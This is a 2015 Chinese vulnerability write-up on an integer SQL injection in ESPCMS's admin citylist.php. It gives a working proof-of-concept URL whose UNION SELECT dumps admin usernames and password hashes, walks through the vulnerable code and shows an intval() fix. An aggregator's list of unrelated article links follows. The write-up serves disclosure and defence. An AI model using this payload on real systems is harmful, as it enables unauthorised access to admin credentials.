.Little Hann
.Little Hann

ESPCMS /adminsoft/control/citylist.php Int SQLInjection Vul

catalog

1. 漏洞描述
2. 漏洞触发条件
3. 漏洞影响范围
4. 漏洞代码分析
5. 防御方法
6. 攻防思考

 

1. 漏洞描述

Relevant Link:
2. 漏洞触发条件

0x1: POC

http://127.0.0.1/ESPCMSV6/adminsoft/index.php?archive=citylist&action=citylist&parentid=-1%20UNION%20select%201,2,concat%28name,0x7c,password%29,4,5%20FROM%20espcms_v6.espcms_admin_member
http://127.0.0.1/ESPCMSV6/adminsoft/index.php?archive=citylist&action=citylist&parentid=-1 UNION select 1,2,concat(name,0x7c,password),4,5 FROM espcms_v6.espcms_admin_member


3. 漏洞影响范围
4. 漏洞代码分析

/adminsoft/control/citylist.php

class important extends connector {

    function important() {
        $this->softbase(true);
    }
    function oncitylist() {
        //接收外部参数parentid
        $parentid = $this->fun->accept('parentid', 'R'); 

        $parentid = empty($parentid) ? 1 : $parentid;
        $verid = $this->fun->accept('verid', 'R');
        $verid = empty($verid) ? 0 : $verid;
        $db_table = db_prefix . 'city';
        $sql = "select * from $db_table where parentid=$parentid";

        die(var_dump($sql));

        $rs = $this->db->query($sql);
        for ($i = 0; $rsList = $this->db->fetch_array($rs); $i++) {
            if ($verid == $rsList['id']) {
                $list.='<option selected value="' . $rsList['id'] . '">' . $rsList['cityname'] . '</option>';
            } else {
                $list.='<option value="' . $rsList['id'] . '">' . $rsList['cityname'] . '</option>';
            }
        }
        exit($list);
    }

}

继续跟进$parentid = $this->fun->accept('parentid', 'R');
/public/class_function.php

function accept($k, $var = 'R', $htmlcode = true, $rehtml = false) {
        switch ($var) {
            case 'G':
                $var = &$_GET;
                break;
            case 'P':
                $var = &$_POST;
                break;
            case 'C':
                $var = &$_COOKIE;
                break;
            case 'R':
                $var = &$_GET;
                if (empty($var[$k])) {
                    $var = &$_POST;
                }
                break;
        }
        //对输入进行了addslash转义,但是对Int整型注入没有效果
        $putvalue = isset($var[$k]) ? $this->daddslashes($var[$k], 0) : NULL; 

        return $htmlcode ? ($rehtml ? $this->preg_htmldecode($putvalue) : $this->htmldecode($putvalue)) : $putvalue;
    }

Relevant Link:

http://www.wooyun.org/bugs/wooyun-2015-0163605


5. 防御方法

/adminsoft/control/citylist.php

class important extends connector {

    function important() {
        $this->softbase(true);
    }
    function oncitylist() {
        //接收外部参数parentid
        $parentid = $this->fun->accept('parentid', 'R'); 
        /**/
        $parentid = intval($parentid);
        /**/

        $parentid = empty($parentid) ? 1 : $parentid;
        $verid = $this->fun->accept('verid', 'R');
        $verid = empty($verid) ? 0 : $verid;
        $db_table = db_prefix . 'city';
        $sql = "select * from $db_table where parentid=$parentid";

        die(var_dump($sql));

        $rs = $this->db->query($sql);
        for ($i = 0; $rsList = $this->db->fetch_array($rs); $i++) {
            if ($verid == $rsList['id']) {
                $list.='<option selected value="' . $rsList['id'] . '">' . $rsList['cityname'] . '</option>';
            } else {
                $list.='<option value="' . $rsList['id'] . '">' . $rsList['cityname'] . '</option>';
            }
        }
        exit($list);
    }

}


6. 攻防思考

Copyright (c) 2015 LittleHann All rights reserved

 

你可能感兴趣的:(ESPCMS /adminsoft/control/citylist.php Int SQLInjection Vul)

  • AWS Actions - Amazon ECS Render Task Definition 宁承榕Song-Thrush
    AWSActions-AmazonECSRenderTaskDefinitionamazon-ecs-render-task-definitionInsertsacontainerimageURIintoanAmazonECStaskdefinitionJSONfile.项目地址:https://gitcode.com/gh_mirrors/am/amazon-ecs-render-task-de
  • Qt界面编程(五) 明阿明 qtlinux
    一、Qt的网络通信使用网络通信模块前,要在.pro文件中添加network模块。QUdpScoket类是Qt对UDP协议的封装:1、创建QUdpSocket对象2、绑定IP的端口号3、发送数据:qint64writeDatagram(constchar*data,qint64len,constQHostAddress&host,quint16port);data:待发送数据的首地址len:待发送数
  • 事件循环(Event Loop)机制对比:Node.js vs 浏览器
    1.共同点:基本事件循环模型两者都基于"任务队列+循环处理"的机制:主线程执行同步代码。异步任务(如I/O、定时器)完成后,回调函数被放入任务队列。事件循环不断检查队列,按规则取出任务执行。2.核心区别(1)任务队列类型不同浏览器Node.js宏任务(Macrotask):•script(整体代码)•setTimeout/setInterval•DOM事件回调(如点击)•requestAnimat
  • 干货 | 50题带你玩转numpy 朱卫军 AI numpy
    这是在stackoverflow和numpy文档里汇总的numpy练习题,目的是为新老用户提供快速参考。1.Importthenumpypackageunderthenamenp(★☆☆)导入numpy包,命名为npimportnumpyasnp2.Printthenumpyversionandtheconfiguration(★☆☆)打印numpy版本和配置print(np.__version_
  • 左神算法之有序二维矩阵中的目标值查找 岳轩子 左神算法算法矩阵线性代数
    有序二维矩阵中的目标值查找目录有序二维矩阵中的目标值查找1.题目描述2.问题解释3.解决思路方法一:逐行二分查找(适合行数较少的情况)方法二:利用行列有序特性(最优解)4.代码实现5.总结1.题目描述给定一个元素为非负整数的二维数组matrix,其中:每一行按照从左到右递增的顺序排列每一列按照从上到下递增的顺序排列再给定一个非负整数aim,请判断aim是否存在于matrix中。示例:int[][]
  • nt!MiFlushSectionInternal函数分析从nt!IoSynchronousPageWrite函数到Ntfs!NtfsFsdWrite函数 sitelist nt4源代码分析MiFlushSectionNtfsFsdWrite
    第一部分:while(TRUE){KeClearEvent(&IoEvent);Status=IoSynchronousPageWrite(FilePointer,Mdl,(PLARGE_INTEGER)&StartingOffset,&IoEvent,IoStatus);1:kd>pnt!MiFlushSectionInternal+0x6f6:80a72410e8c74bfbffcallnt!
  • Python爬虫网安-request+示例 Whoisshutiao python爬虫网安python爬虫开发语言网络安全
    目录get&post自定义请求头文件上传添加cookie获取网页使用cookiejarsessionssl证书校验超时身份认证(httpbasicAuth)代理配置get&post#!/usr/bin/envpythonimportrequests#get#r=requests.get('http://httpbin.org/get')#print(r.text)#添加参数的get请求data={
  • Flutter基础(UI监听) aaiier flutter前端
    文本按钮(TextButton)文本按钮是没有边框的按钮,当点击时会有涟漪效果。TextButton(onPressed:(){//点击按钮后要执行的代码print('文本按钮被点击了');},child:Text('点击我'),)手势检测器(GestureDetector)GestureDetector能够检测多种手势,不只是点击,还包括滑动、长按等。GestureDetector(onTap:
  • print(str(3+5))的结果是什么?为什么? Lauren_Lu python
    ✅语句:print(str(3+5))✅执行顺序与含义:括号优先:先计算3+5+是加法运算符3+5是一个表达式,结果为整数8使用str()函数将结果转换为字符串str(8)返回字符串'8'使用print()打印这个字符串print('8')的输出就是:8✅为什么要运算?因为:Python遇到表达式3+5时,必须先计算出结果;str()需要一个值作为参数,而不是一个没计算的表达式;这是Python表
  • 关于插件参数传递 harmonyos
    关于插件参数传递按照以前的习惯,dart端传递map参数,原生端根据map解析参数。但由于ts支持将字符串直接转换成对应的interface,那么我们可以将dart的端的参数。参数定义比如geolocator_ohos中的CurrentLocationSettingsOhos在dart端的实现为如下:MaptoMap(){return{if(priority!=null)'priority':pr
  • opencv —— floodFill 漫水填充法 实现证件照换背景 老干妈就泡面 opencv人工智能计算机视觉
    漫水填充:floodFill函数简单来说,漫水填充就是自动选中与种子像素相连的区域,利用指定颜色进行区域颜色填充。Windows画图工具中的油漆桶功能和Photoshop的魔法棒选择工具,都是漫水填充的改进和延伸。//第一个版本intfloodFill(InputOutputArrayimage,PointseedPoint,ScalarnewVal,Rect*rect=0,ScalarloDif
  • 2025年化学工程与复合材料国际会议(ICCECM 2025) 学术-罗老师 理工科人工智能
    2025InternationalConferenceonChemicalEngineeringandCompositeMaterials一、大会信息会议简称:ICCECM2025大会地点:中国·苏州收录检索:提交EiCompendex,CPCI,CNKI,GoogleScholar等二、会议简介为促进我国复合材料和化学工程规范、可持续、健康发展,增强科技创新能力,促进跨学科融合和产学研结合,了解
  • 2025年交通运输与区域经济国际会议(ICTRE 2025) 学术-罗老师 理工科论文笔记论文阅读经济
    20252ndInternationalConferenceonTransportationandRegionalEconomy一、大会信息会议简称:ICTRE2025大会地点:中国·重庆收录检索:提交EiCompendex,CPCI,CNKI,GoogleScholar等二、会议简介第二届交通运输与区域经济国际会议即将在中国重庆隆重召开。此次会议致力于搭建一个国际化的学术交流平台,汇聚全球范围内
  • python编译Edge-tts: Edge tts Player 浩读语音朗读 edge-ttspython自然语言处理edge前端
    Edge-TTS是Python库,通过微软AzureCognitiveServices转化文本为自然语音,Edge-TTS支持40多种语言和300种声音,提供优质的语音输出,这给学习外语的学生和老师很大的福利。下面,尝试着用python来编写一个简单的TTS转MP3。EdgeTTSfromtkinterimport*fromtkinterimportttkfromtkinter.filedialo
  • OpenAI-Compatible Edge-TTS API 使用教程 马琥承
    OpenAI-CompatibleEdge-TTSAPI使用教程openai-edge-ttsFree,high-qualitytext-to-speechAPIendpointtoreplaceOpenAI,Azure,orElevenLabs项目地址:https://gitcode.com/gh_mirrors/op/openai-edge-tts1.项目介绍本项目提供了一个本地化的、与Ope
  • 开源项目安装与配置指南:OpenAI-Compatible Edge-TTS API 霍虹情Victorious
    开源项目安装与配置指南:OpenAI-CompatibleEdge-TTSAPIopenai-edge-ttsFree,high-qualitytext-to-speechAPIendpointtoreplaceOpenAI,Azure,orElevenLabs项目地址:https://gitcode.com/gh_mirrors/op/openai-edge-tts1.项目基础介绍OpenAI-
  • IDEA:程序编译报错:java: Compilation failed: internal java compiler error 天黑请闭眼 intellij-ideaJava异常处理intellij-ideajava
    目录简介异常信息排查原因解决简介代码无法编译、无法打包异常信息java:Compilationfailed:internaljavacompilererror排查1、代码近期没有改动过,原先是可以正常编译的2、查看程序JDK,是JDK1.8没错,与原先JDK一致3、出现无法编译的情况是在升级IDEA版本之后4、使用IDEA-2024版本无法编译5、使用IDEA-2019、IDEA-2022版本可正
  • 飞算 JavaAI 2.0.0和 AI 编程技术设计的 120 章 Java 系统教程 AI编程员 001AI传统&编程语言002AI编程工具汇总003AI编程作品汇总开发语言深度学习pillowAI编程人工智能
    以下是基于飞算JavaAI2.0.0和AI编程技术设计的120章Java系统教程,涵盖从基础到高阶、理论到实践的全栈知识体系,结合经典案例与企业级项目实战,适合零基础到架构师的学习路径:第一部分:基础入门(第1-30章)Java开发环境配置JDK21+IntelliJIDEA+飞算AI插件安装第一个AI生成的HelloWorld程序基础语法与AI辅助编程数据类型、变量、运算符飞算AI:自动生成算法
  • Java猜拳小游戏 wp_tao Java从入门到精通java开发语言
    Java猜拳小游戏使用java设计一个猜拳小游戏,要求如下:在控制台提示用户输入出拳结果(1:石头,2:剪刀,3:布)。计算机生成出拳结果。裁判判断出拳结果。输出游戏结果。com.game.Judge.java。packagecom.game;publicclassJudge{privateintplayer1;//选手一的出拳结果:1为石头,2为剪刀,3为布
  • 基于 Kintex UltraScale 系列 2 路 QSFP+40G 光纤 PCIe 数据传输卡 / 光纤适配器(5GByte/s 带宽KU060光纤 PCIe 数据传输卡) F_white 数据中心视频与图像采集处理机器视觉
    PCIE732是一款基于PCIE总线架构的高性能数据传输卡,板卡具有1个PCIex8主机接口、2个QSFP+40G光纤接口,可以实现2路QSFP+40G光纤的数据实时采集、传输。板卡采用Xilinx的高性能KintexUltraScale系列FPGA作为实时处理器,板载2组独立的72位DDR4SDRAM大容量缓存。板卡具有1个RJ45千兆以太网口以及若干IO信号。一般应用于基于服务器的雷
  • WPF中获取主窗体 周杰伦fans ai学习参考WPF笔记学习C#的笔记wpf
    在WPF的MVVM模式中,通常不直接引用主窗体(MainWindow),而是通过依赖注入、事件聚合器或命令参数传递等方式实现逻辑解耦。以下是几种推荐方法:方法1:依赖注入(推荐)在ViewModel中定义一个接口,通过构造函数注入主窗体服务。步骤:定义接口(可选):publicinterfaceIMainWindowService{voidShowMessage(stringmessage);}在
  • 微信支付回调验证实战:构建防伪造请求的3道防火墙 IT莫染 工具及插件#配置SpringBootDemo微信SpringBoot3.2微信支付V3API数据签名防重放攻击
    ⚡痛点场景当你的电商系统遭遇:黑客伪造支付成功回调→0元订单自动发货重放攻击→单笔交易多次发货中间人篡改金额→1999元订单变成1.99元微信官方数据:未验签的回调接口被攻击概率高达73%安全架构三重防护️核心代码实现(SpringBoot≥3.1,JDK17+)防火墙1:签名验证(关键防伪造)@RestController@RequestMapping("/payment")publicclas
  • 基于springboot的社会志愿者管理系统 QQ242219979 springboot后端java
    目录部分效果实现截图本系统介绍关于我开发技术详细介绍开发思路核心代码参考示例基于springboot的社会志愿者管理系统论文提纲参考系统测试源码获取详细视频演示或者查看其他版本:文章底部获取博主联系方式!部分效果实现截图本系统介绍基于springboot的社会志愿者管理系统采用的开发工具:IntelliJIDEA,VScode;数据库管理软件:Navicat;服务器运行平台:Tomcat;开发技术
  • Flask(二) 路由routes @昵称不存在 Flaskflask
    文章目录基本路由定义路由参数路由规则设置请求方法(GET/POST)路由函数返回静态文件和模板Blueprint(模块化路由)显示当前所有路由Flask路由是Web应用程序中将URL映射到Python函数的机制。定义路由:使用@app.route(‘/path’)装饰器定义URL和视图函数的映射。路由参数:通过动态部分在URL中传递参数。路由规则:使用类型转换器指定URL参数的类型。请求方法:指定
  • Spring Cache+Redis缓存方案详解:从代码到实践 大手你不懂 JavaJava项目实战Redisspring缓存redis
    描述:在现代Java开发中,缓存是提升系统性能的核心手段之一。本文通过实际代码案例,深入解析SpringCache与Redis的集成原理,结合项目中的ModuleDatabaseInfoService接口和RedisConfig配置,探讨如何通过声明式缓存实现高效的数据库访问优化。一、核心代码解析1.服务接口设计(拿查询数据源配置信息举例)publicinterfaceModuleDatabase
  • Club_IntelliMatch_Development_Guide Joseit pythonpythonpygamedjangoflask
    ClubIntelliMatch系统-全栈开发流程文档概述ClubIntelliMatch系统是一个现代化的社团活动智能匹配平台,采用前后端分离架构。系统基于PythonFlask构建RESTfulAPI后端,Vue.js3+Vite构建现代化前端,MySQL作为持久化数据存储。本文档深入分析了整个开发流程的技术架构、设计原则和实现细节。系统架构流程图后端API架构前端组件架构app.pyFlas
  • sentinel 自定义 dashboard 用户名密码 运维阿峰 sentinelsentinelpython开发语言
    默认情况下,sentineldashboard用户名密码为sentinel/sentinel,这里我使用重写镜像的方式://定义Dockerfile$catDockerfile#基于现有SentinelDashboard镜像FROMbladex/sentinel-dashboard:1.8.4#重新定义ENTRYPOINT,确保参数顺序正确ENTRYPOINT["java","-Djava.sec
  • 重排利器:行列式点过程(DPP)在推荐系统中的应用 Jay Kay 推荐算法数学建模推荐算法
    在推荐系统的重排阶段,我们常面临结果同质化问题——精排结果相似物料扎堆,导致用户体验单调。行列式点过程(DeterminantalPointProcesses,DPP)通过数学建模相关性与多样性的平衡,成为解决该问题的经典方案。一、DPP的核心思想DPP将推荐列表视为一个点过程,其核心是计算子集出现的概率。给定候选集(Z)(精排输出的Top-N物料),DPP定义子集(Y\subseteqZ)出现的
  • Git 高级操作篇:宝子们的Git进阶神器⚡,掌握Git高级技能成为版本控制大师 真实的菜 gitgitelasticsearch大数据
    Git高级操作篇:宝子们的Git进阶神器⚡,掌握Git高级技能成为版本控制大师!文章目录Git高级操作篇:宝子们的Git进阶神器⚡,掌握Git高级技能成为版本控制大师!前言:为什么要学习Git高级操作?一、InteractiveRebase:交互式变基的艺术1.1什么是InteractiveRebase?1.2InteractiveRebase的操作选项常用操作详解1.3实战案例:清理提交历史二、
  • 深入学习 GORM:记录插入与数据检索 Code季风 GORM从入门到精通学习数据库golang后端
    引言在使用GORM进行数据库操作时,掌握如何高效地插入记录和检索数据是非常重要的。本文将详细介绍通过Create方法插入记录、批量插入、以及各种数据检索方法,并结合实际示例进行讲解。一、通过Create方法插入记录GORM提供了简单易用的Create方法来插入单条记录。以下是一个基本示例:typeUserstruct{IDuintNamestring}varuser=User{Name:"jinz
  • java观察者模式 3213213333332132 java设计模式游戏观察者模式
    观察者模式——顾名思义,就是一个对象观察另一个对象,当被观察的对象发生变化时,观察者也会跟着变化。 在日常中,我们配java环境变量时,设置一个JAVAHOME变量,这就是被观察者,使用了JAVAHOME变量的对象都是观察者,一旦JAVAHOME的路径改动,其他的也会跟着改动。 这样的例子很多,我想用小时候玩的老鹰捉小鸡游戏来简单的描绘观察者模式。 老鹰会变成观察者,母鸡和小鸡是
  • TFS RESTful API 模拟上传测试 ronin47
           TFS RESTful API 模拟上传测试。    细节参看这里:https://github.com/alibaba/nginx-tfs/blob/master/TFS_RESTful_API.markdown 模拟POST上传一个图片: curl --data-binary @/opt/tfs.png http
  • PHP常用设计模式单例, 工厂, 观察者, 责任链, 装饰, 策略,适配,桥接模式 dcj3sjt126com 设计模式PHP
    // 多态, 在JAVA中是这样用的, 其实在PHP当中可以自然消除, 因为参数是动态的, 你传什么过来都可以, 不限制类型, 直接调用类的方法 abstract class Tiger { public abstract function climb(); } class XTiger extends Tiger { public function climb()
  • hibernate 171815164 Hibernate
    main,save Configuration conf =new Configuration().configure(); SessionFactory sf=conf.buildSessionFactory(); Session sess=sf.openSession(); Transaction tx=sess.beginTransaction(); News a=new
  • Ant实例分析 g21121 ant
            下面是一个Ant构建文件的实例,通过这个实例我们可以很清楚的理顺构建一个项目的顺序及依赖关系,从而编写出更加合理的构建文件。           下面是build.xml的代码: <?xml version="1
  • [简单]工作记录_接口返回405原因 53873039oycg 工作
             最近调接口时候一直报错,错误信息是:       responseCode:405 responseMsg:Method Not Allowed        接口请求方式Post.
  • 关于java.lang.ClassNotFoundException 和 java.lang.NoClassDefFoundError 的区别 程序员是怎么炼成的
       真正完成类的加载工作是通过调用 defineClass来实现的;  而启动类的加载过程是通过调用 loadClass来实现的;  就是类加载器分为加载和定义   protected Class<?> findClass(String name) throws ClassNotFoundExcept
  • JDBC学习笔记-JDBC详细的操作流程 aijuans jdbc
    所有的JDBC应用程序都具有下面的基本流程:  1、加载数据库驱动并建立到数据库的连接。  2、执行SQL语句。  3、处理结果。  4、从数据库断开连接释放资源。 下面我们就来仔细看一看每一个步骤: 其实按照上面所说每个阶段都可得单独拿出来写成一个独立的类方法文件。共别的应用来调用。 1、加载数据库驱动并建立到数据库的连接:   Html代码  St
  • rome创建rss antonyup_2006 tomcatcmsxmlstrutsOpera
    引用 1.RSS标准 RSS标准比较混乱,主要有以下3个系列 RSS 0.9x / 2.0 : RSS技术诞生于1999年的网景公司(Netscape),其发布了一个0.9版本的规范。2001年,RSS技术标准的发展工作被Userland Software公司的戴夫 温那(Dave Winer)所接手。陆续发布了0.9x的系列版本。当W3C小组发布RSS 1.0后,Dave W
  • html表格和表单基础 百合不是茶 html表格表单meta锚点
    第一次用html来写东西,感觉压力山大,每次看见别人发的都是比较牛逼的 再看看自己什么都还不会,   html是一种标记语言,其实很简单都是固定的格式   _----------------------------------------表格和表单 表格是html的重要组成部分,表格用在body里面的 主要用法如下; <table> &
  • ibatis如何传入完整的sql语句 bijian1013 javasqlibatis
            ibatis如何传入完整的sql语句?进一步说,String str ="select * from test_table",我想把str传入ibatis中执行,是传递整条sql语句。         解决办法: <
  • 精通Oracle10编程SQL(14)开发动态SQL bijian1013 oracle数据库plsql
    /* *开发动态SQL */ --使用EXECUTE IMMEDIATE处理DDL操作 CREATE OR REPLACE PROCEDURE drop_table(table_name varchar2) is sql_statement varchar2(100); begin sql_statement:='DROP TABLE '||table_name;
  • 【Linux命令】Linux工作中常用命令 bit1129 linux命令
    不断的总结工作中常用的Linux命令   1.查看端口被哪个进程占用   通过这个命令可以得到占用8085端口的进程号,然后通过ps -ef|grep 进程号得到进程的详细信息   netstat -anp | grep 8085   察看进程ID对应的进程占用的端口号   netstat -anp | grep 进程ID &
  • 优秀网站和文档收集 白糖_ 网站
    集成 Flex, Spring, Hibernate 构建应用程序   性能测试工具-JMeter   Hmtl5-IOCN网站   Oracle精简版教程网站   鸟哥的linux私房菜   Jetty中文文档   50个jquery必备代码片段   swfobject.js检测flash版本号工具
  • angular.extend boyitech AngularJSangular.extendAngularJS API
    angular.extend 复制src对象中的属性去dst对象中. 支持多个src对象. 如果你不想改变一个对象,你可以把dst设为空对象{}: var object = angular.extend({}, object1, object2). 注意: angular.extend不支持递归复制. 使用方法: angular.extend(dst, src); 参数:
  • java-谷歌面试题-设计方便提取中数的数据结构 bylijinnan java
    网上找了一下这道题的解答,但都是提供思路,没有提供具体实现。其中使用大小堆这个思路看似简单,但实现起来要考虑很多。 以下分别用排序数组和大小堆来实现。 使用大小堆: import java.util.Arrays; public class MedianInHeap { /** * 题目:设计方便提取中数的数据结构 * 设计一个数据结构,其中包含两个函数,1.插
  • ajaxFileUpload 针对 ie jquery 1.7+不能使用问题修复版本 Chen.H ajaxFileUploadie6ie7ie8ie9
    jQuery.extend({ handleError: function( s, xhr, status, e ) { // If a local callback was specified, fire it if ( s.error ) { s.error.call( s.context || s, xhr, status, e ); }
  • [机器人制造原则]机器人的电池和存储器必须可以替换 comsci 制造
           机器人的身体随时随地可能被外来力量所破坏,但是如果机器人的存储器和电池可以更换,那么这个机器人的思维和记忆力就可以保存下来,即使身体受到伤害,在把存储器取下来安装到一个新的身体上之后,原有的性格和能力都可以继续维持.....        另外,如果一
  • Oracle Multitable INSERT 的用法 daizj oracle
    转载Oracle笔记-Multitable INSERT 的用法 http://blog.chinaunix.net/uid-8504518-id-3310531.html 一、Insert基础用法 语法:     Insert Into 表名 (字段1,字段2,字段3...)     Values (值1,
  • 专访黑客历史学家George Dyson datamachine on
    20世纪最具威力的两项发明——核弹和计算机出自同一时代、同一群年青人。可是,与大名鼎鼎的曼哈顿计划(第二次世界大战中美国原子弹研究计划)相 比,计算机的起源显得默默无闻。出身计算机世家的历史学家George Dyson在其新书《图灵大教堂》(Turing’s Cathedral)中讲述了阿兰·图灵、约翰·冯·诺依曼等一帮子天才小子创造计算机及预见计算机未来
  • 小学6年级英语单词背诵第一课 dcj3sjt126com englishword
    always 总是 rice 水稻,米饭 before 在...之前 live 生活,居住   usual 通常的 early 早的 begin 开始 month 月份   year 年 last 最后的 east 东方的 high 高的   far 远的 window 窗户 world 世界 than 比...更  
  • 在线IT教育和在线IT高端教育 dcj3sjt126com 教育
    codecademy  http://www.codecademy.com codeschool  https://www.codeschool.com teamtreehouse  http://teamtreehouse.com lynda http://www.lynda.com/ Coursera https://www.coursera.
  • Struts2 xml校验框架所定义的校验文件 蕃薯耀 Struts2 xml校验Struts2 xml校验框架Struts2校验
      >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 蕃薯耀 2015年7月11日 15:54:59 星期六 http://fa
  • mac下安装rar和unrar命令 hanqunfeng mac
    1.下载:http://www.rarlab.com/download.htm 选择 RAR 5.21 for Mac OS X 2.解压下载后的文件 tar -zxvf rarosx-5.2.1.tar 3.cd rar sudo install -c -o $USER unrar /bin #输入当前用户登录密码 sudo install -c -o $USER rar
  • 三种将list转换为map的方法 jackyrong list
      在本文中,介绍三种将list转换为map的方法: 1) 传统方法 假设有某个类如下    class Movie { private Integer rank; private String description; public Movie(Integer rank, String des
  • 年轻程序员需要学习的5大经验 lampcy 工作PHP程序员
    在过去的7年半时间里,我带过的软件实习生超过一打,也看到过数以百计的学生和毕业生的档案。我发现很多事情他们都需要学习。或许你会说,我说的不就是某种特定的技术、算法、数学,或者其他特定形式的知识吗?没错,这的确是需要学习的,但却并不是最重要的事情。他们需要学习的最重要的东西是“自我规范”。这些规范就是:尽可能地写出最简洁的代码;如果代码后期会因为改动而变得凌乱不堪就得重构;尽量删除没用的代码,并添加
  • 评“女孩遭野蛮引产致终身不育 60万赔偿款1分未得”医腐深入骨髓 nannan408
    先来看南方网的一则报道: 再正常不过的结婚、生子,对于29岁的郑畅来说,却是一个永远也无法实现的梦想。从2010年到2015年,从24岁到29岁,一张张新旧不一的诊断书记录了她病情的同时,也清晰地记下了她人生的悲哀。   粗暴手术让人发寒   2010年7月,在酒店做服务员的郑畅发现自己怀孕了,可男朋友却联系不上。在没有和家人商量的情况下,她决定堕胎。   12月5日,
  • 使用jQuery为input输入框绑定回车键事件 VS 为a标签绑定click事件 Everyday都不同 jspinput回车键绑定clickenter
    假设如题所示的事件为同一个,必须先把该js函数抽离出来,该函数定义了监听的处理:   function search() { //监听函数略...... }   为input框绑定回车事件,当用户在文本框中输入搜索关键字时,按回车键,即可触发search():   //回车绑定 $(".search").keydown(fun
  • EXT学习记录 tntxia ext
      1. 准备   (1) 官网:http://www.sencha.com/   里面有源代码和API文档下载。   EXT的域名已经从www.extjs.com改成了www.sencha.com ,但extjs这个域名会自动转到sencha上。   (2)帮助文档:   想要查看EXT的官方文档的话,可以去这里h
  • mybatis3的mapper文件报Referenced file contains errors xingguangsixian mybatis
    最近使用mybatis.3.1.0时无意中碰到一个问题: The errors below were detected when validating the file "mybatis-3-mapper.dtd" via the file "account-mapper.xml". In most cases these errors can be d
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他